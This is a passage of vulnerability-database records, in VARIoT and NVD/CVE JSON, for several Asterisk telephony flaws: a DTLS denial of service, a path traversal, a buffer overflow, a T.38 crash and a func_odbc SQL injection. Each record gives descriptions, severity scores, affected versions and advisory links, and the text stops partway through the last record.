            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-01312"
          }
        ]
      },
      "last_update_date": "2023-12-18T12:27:54.815000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "AST-2019-008",
            "trust": 0.8,
            "url": "http://downloads.asterisk.org/pub/security/ast-2019-008.html"
          },
          {
            "title": "Security Advisories",
            "trust": 0.8,
            "url": "https://www.asterisk.org/downloads/security-advisories"
          },
          {
            "title": "Patch for Sangoma Technologies Asterisk and Sangoma Technologies Certified Asterisk Code Issue Vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchinfo/show/196675"
          },
          {
            "title": "Sangoma Technologies Asterisk  and Sangoma Technologies Certified Asterisk Fixes for code issue vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=104688"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-01312"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-012748"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1292"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-476",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-012748"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-18976"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.2,
            "url": "https://seclists.org/fulldisclosure/2019/nov/20"
          },
          {
            "trust": 2.2,
            "url": "http://downloads.asterisk.org/pub/security/ast-2019-008.html"
          },
          {
            "trust": 2.2,
            "url": "https://packetstormsecurity.com/files/155436/asterisk-project-security-advisory-ast-2019-008.html"
          },
          {
            "trust": 1.6,
            "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
          },
          {
            "trust": 1.6,
            "url": "https://www.asterisk.org/downloads/security-advisories"
          },
          {
            "trust": 1.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2019112218?affchecked=1"
          },
          {
            "trust": 1.5,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18976"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-18976"
          },
          {
            "trust": 0.6,
            "url": "http://downloads.asterisk.org/pub/security/ast-2019-007.html"
          },
          {
            "trust": 0.6,
            "url": "http://downloads.asterisk.org/pub/security/ast-2019-006.html"
          },
          {
            "trust": 0.6,
            "url": "https://vigilance.fr/vulnerability/asterisk-denial-of-service-via-t-38-sdp-re-invite-30937"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2019.4421/"
          },
          {
            "trust": 0.1,
            "url": "http://downloads.asterisk.org/pub/security/ast-2019-008-13.diff"
          },
          {
            "trust": 0.1,
            "url": "https://issues.asterisk.org/jira/browse/asterisk-28612"
          },
          {
            "trust": 0.1,
            "url": "http://downloads.digium.com/pub/security/.pdf"
          },
          {
            "trust": 0.1,
            "url": "http://www.asterisk.org/security"
          },
          {
            "trust": 0.1,
            "url": "http://downloads.digium.com/pub/security/.html"
          },
          {
            "trust": 0.1,
            "url": "http://downloads.asterisk.org/pub/security/ast-2019-008-13.21.diff"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-01312"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-012748"
          },
          {
            "db": "PACKETSTORM",
            "id": "155436"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-18976"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1292"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-01312"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-012748"
          },
          {
            "db": "PACKETSTORM",
            "id": "155436"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-18976"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1292"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-01-10T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-01312"
          },
          {
            "date": "2019-12-12T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-012748"
          },
          {
            "date": "2019-11-21T23:55:55",
            "db": "PACKETSTORM",
            "id": "155436"
          },
          {
            "date": "2019-11-22T17:15:11.833000",
            "db": "NVD",
            "id": "CVE-2019-18976"
          },
          {
            "date": "2019-11-21T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201911-1292"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-01-10T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-01312"
          },
          {
            "date": "2019-12-12T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-012748"
          },
          {
            "date": "2022-06-03T14:41:01.313000",
            "db": "NVD",
            "id": "CVE-2019-18976"
          },
          {
            "date": "2022-04-06T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201911-1292"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1292"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Sangoma Asterisk and  Certified Asterisk In  NULL Pointer dereference vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-012748"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "code problem",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1292"
          }
        ],
        "trust": 0.6
      }
    }

    CVE-2023-49786 (GCVE-0-2023-49786)

    Vulnerability from nvd – Published: 2023-12-14 19:47 – Updated: 2025-02-13 17:18
    VLAI
    Title
    Asterisk susceptible to Denial of Service via DTLS Hello packets during call initiation
    Summary
    Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6.
    SSVC
    Exploitation: poc Automatable: yes Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-703 - Improper Check or Handling of Exceptional Conditions
    Assigner
    Impacted products
    Vendor Product Version
    asterisk asterisk Affected: < 18.20.1
    Affected: >= 19.0.0, < 20.5.1
    Affected: = 21.0.0
    Affected: < 18.9-cert6
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-02T22:01:25.997Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq",
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq"
              },
              {
                "name": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05",
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05"
              },
              {
                "name": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race",
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race"
              },
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "http://www.openwall.com/lists/oss-security/2023/12/15/7"
              },
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "http://packetstormsecurity.com/files/176251/Asterisk-20.1.0-Denial-Of-Service.html"
              },
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "http://seclists.org/fulldisclosure/2023/Dec/24"
              },
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
              }
            ],
            "title": "CVE Program Container"
          },
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2023-49786",
                    "options": [
                      {
                        "Exploitation": "poc"
                      },
                      {
                        "Automatable": "yes"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2024-10-08T14:19:55.907894Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2024-10-08T14:20:19.222Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "asterisk",
              "vendor": "asterisk",
              "versions": [
                {
                  "status": "affected",
                  "version": "\u003c 18.20.1"
                },
                {
                  "status": "affected",
                  "version": "\u003e= 19.0.0, \u003c 20.5.1"
                },
                {
                  "status": "affected",
                  "version": "= 21.0.0"
                },
                {
                  "status": "affected",
                  "version": "\u003c 18.9-cert6"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6."
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "HIGH",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "NONE",
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.1"
              }
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-703",
                  "description": "CWE-703: Improper Check or Handling of Exceptional Conditions",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2023-12-29T00:06:18.647Z",
            "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
            "shortName": "GitHub_M"
          },
          "references": [
            {
              "name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq",
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq"
            },
            {
              "name": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05",
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05"
            },
            {
              "name": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race",
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race"
            },
            {
              "url": "http://www.openwall.com/lists/oss-security/2023/12/15/7"
            },
            {
              "url": "http://packetstormsecurity.com/files/176251/Asterisk-20.1.0-Denial-Of-Service.html"
            },
            {
              "url": "http://seclists.org/fulldisclosure/2023/Dec/24"
            },
            {
              "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
            }
          ],
          "source": {
            "advisory": "GHSA-hxj9-xwr8-w8pq",
            "discovery": "UNKNOWN"
          },
          "title": "Asterisk susceptible to Denial of Service via DTLS Hello packets during call initiation"
        }
      },
      "cveMetadata": {
        "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "assignerShortName": "GitHub_M",
        "cveId": "CVE-2023-49786",
        "datePublished": "2023-12-14T19:47:46.306Z",
        "dateReserved": "2023-11-30T13:39:50.862Z",
        "dateUpdated": "2025-02-13T17:18:55.224Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2023-49294 (GCVE-0-2023-49294)

    Vulnerability from nvd – Published: 2023-12-14 19:40 – Updated: 2025-02-13 17:18
    VLAI
    Title
    Asterisk Path Traversal vulnerability
    Summary
    Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue.
    CWE
    • CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
    Assigner
    Impacted products
    Vendor Product Version
    asterisk asterisk Affected: < 18.20.1
    Affected: >= 19.0.0, < 20.5.1
    Affected: = 21.0.0
    Affected: < 18.9-cert6
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-02T21:53:45.375Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f",
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f"
              },
              {
                "name": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5",
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
              },
              {
                "name": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757",
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757"
              },
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "asterisk",
              "vendor": "asterisk",
              "versions": [
                {
                  "status": "affected",
                  "version": "\u003c 18.20.1"
                },
                {
                  "status": "affected",
                  "version": "\u003e= 19.0.0, \u003c 20.5.1"
                },
                {
                  "status": "affected",
                  "version": "= 21.0.0"
                },
                {
                  "status": "affected",
                  "version": "\u003c 18.9-cert6"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue."
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 4.9,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "HIGH",
                "integrityImpact": "NONE",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              }
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-22",
                  "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2023-12-29T00:06:21.896Z",
            "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
            "shortName": "GitHub_M"
          },
          "references": [
            {
              "name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f",
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f"
            },
            {
              "name": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5",
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
            },
            {
              "name": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757",
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757"
            },
            {
              "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
            }
          ],
          "source": {
            "advisory": "GHSA-8857-hfmw-vg8f",
            "discovery": "UNKNOWN"
          },
          "title": "Asterisk Path Traversal vulnerability"
        }
      },
      "cveMetadata": {
        "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "assignerShortName": "GitHub_M",
        "cveId": "CVE-2023-49294",
        "datePublished": "2023-12-14T19:40:46.157Z",
        "dateReserved": "2023-11-24T16:45:24.314Z",
        "dateUpdated": "2025-02-13T17:18:40.277Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2023-37457 (GCVE-0-2023-37457)

    Vulnerability from nvd – Published: 2023-12-14 19:43 – Updated: 2025-02-13 17:01
    VLAI
    Title
    Asterisk's PJSIP_HEADER dialplan function can overwrite memory/cause crash when using 'update'
    Summary
    Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk versions 18.20.0 and prior, 20.5.0 and prior, and 21.0.0; as well as ceritifed-asterisk 18.9-cert5 and prior, the 'update' functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the 'update' functionality is not used the vulnerability does not occur. A patch is available at commit a1ca0268254374b515fa5992f01340f7717113fa.
    CWE
    • CWE-120 - Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
    Assigner
    Impacted products
    Vendor Product Version
    asterisk asterisk Affected: <= 18.20.0
    Affected: >= 19.0.0, <= 20.5.0
    Affected: = 21.0.0
    Affected: <= 18.9-cert5
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-02T17:16:30.273Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh",
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh"
              },
              {
                "name": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa",
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa"
              },
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "asterisk",
              "vendor": "asterisk",
              "versions": [
                {
                  "status": "affected",
                  "version": "\u003c= 18.20.0"
                },
                {
                  "status": "affected",
                  "version": "\u003e= 19.0.0, \u003c= 20.5.0"
                },
                {
                  "status": "affected",
                  "version": "= 21.0.0"
                },
                {
                  "status": "affected",
                  "version": "\u003c= 18.9-cert5"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk versions 18.20.0 and prior, 20.5.0 and prior, and 21.0.0; as well as ceritifed-asterisk 18.9-cert5 and prior, the \u0027update\u0027 functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the \u0027update\u0027 functionality is not used the vulnerability does not occur. A patch is available at commit a1ca0268254374b515fa5992f01340f7717113fa."
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "HIGH",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "NONE",
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.1"
              }
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-120",
                  "description": "CWE-120: Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2023-12-29T00:06:20.393Z",
            "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
            "shortName": "GitHub_M"
          },
          "references": [
            {
              "name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh",
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh"
            },
            {
              "name": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa",
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa"
            },
            {
              "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
            }
          ],
          "source": {
            "advisory": "GHSA-98rc-4j27-74hh",
            "discovery": "UNKNOWN"
          },
          "title": "Asterisk\u0027s PJSIP_HEADER dialplan function can overwrite memory/cause crash when using \u0027update\u0027"
        }
      },
      "cveMetadata": {
        "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "assignerShortName": "GitHub_M",
        "cveId": "CVE-2023-37457",
        "datePublished": "2023-12-14T19:43:30.945Z",
        "dateReserved": "2023-07-06T13:01:36.996Z",
        "dateUpdated": "2025-02-13T17:01:26.636Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2021-46837 (GCVE-0-2021-46837)

    Vulnerability from nvd – Published: 2022-08-30 00:00 – Updated: 2024-08-04 05:17
    VLAI
    Summary
    res_pjsip_t38 in Sangoma Asterisk 16.x before 16.16.2, 17.x before 17.9.3, and 18.x before 18.2.2, and Certified Asterisk before 16.8-cert7, allows an attacker to trigger a crash by sending an m=image line and zero port in a response to a T.38 re-invite initiated by Asterisk. This is a re-occurrence of the CVE-2019-15297 symptoms but not for exactly the same reason. The crash occurs because there is an append operation relative to the active topology, but this should instead be a replace operation.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-04T05:17:42.455Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "https://downloads.asterisk.org/pub/security/AST-2021-006.html"
              },
              {
                "name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
                "tags": [
                  "mailing-list",
                  "x_transferred"
                ],
                "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
              },
              {
                "name": "DSA-5285",
                "tags": [
                  "vendor-advisory",
                  "x_transferred"
                ],
                "url": "https://www.debian.org/security/2022/dsa-5285"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "res_pjsip_t38 in Sangoma Asterisk 16.x before 16.16.2, 17.x before 17.9.3, and 18.x before 18.2.2, and Certified Asterisk before 16.8-cert7, allows an attacker to trigger a crash by sending an m=image line and zero port in a response to a T.38 re-invite initiated by Asterisk. This is a re-occurrence of the CVE-2019-15297 symptoms but not for exactly the same reason. The crash occurs because there is an append operation relative to the active topology, but this should instead be a replace operation."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2022-11-18T00:00:00.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "url": "https://downloads.asterisk.org/pub/security/AST-2021-006.html"
            },
            {
              "name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
              "tags": [
                "mailing-list"
              ],
              "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
            },
            {
              "name": "DSA-5285",
              "tags": [
                "vendor-advisory"
              ],
              "url": "https://www.debian.org/security/2022/dsa-5285"
            }
          ]
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2021-46837",
        "datePublished": "2022-08-30T00:00:00.000Z",
        "dateReserved": "2022-08-30T00:00:00.000Z",
        "dateUpdated": "2024-08-04T05:17:42.455Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2022-26651 (GCVE-0-2022-26651)

    Vulnerability from nvd – Published: 2022-04-15 00:00 – Updated: 2024-08-03 05:11
    VLAI
    Summary
    An issue was discovered in Asterisk through 19.x and Certified Asterisk through 16.8-cert13. The func_odbc module provides possibly inadequate escaping functionality for backslash characters in SQL queries, resulting in user-provided data creating a broken SQL query or possibly a SQL injection. This is fixed in 16.25.2, 18.11.2, and 19.3.2, and 16.8-cert14.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-03T05:11:43.391Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "https://downloads.asterisk.org/pub/security/"
              },
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "https://downloads.asterisk.org/pub/security/AST-2022-003.html"
              },
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "http://packetstormsecurity.com/files/166746/Asterisk-Project-Security-Advisory-AST-2022-003.html"
              },
              {
                "name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
                "tags": [
                  "mailing-list",
                  "x_transferred"
                ],
                "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
              },
              {
                "name": "DSA-5285",
                "tags": [
                  "vendor-advisory",
                  "x_transferred"
                ],
                "url": "https://www.debian.org/security/2022/dsa-5285"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
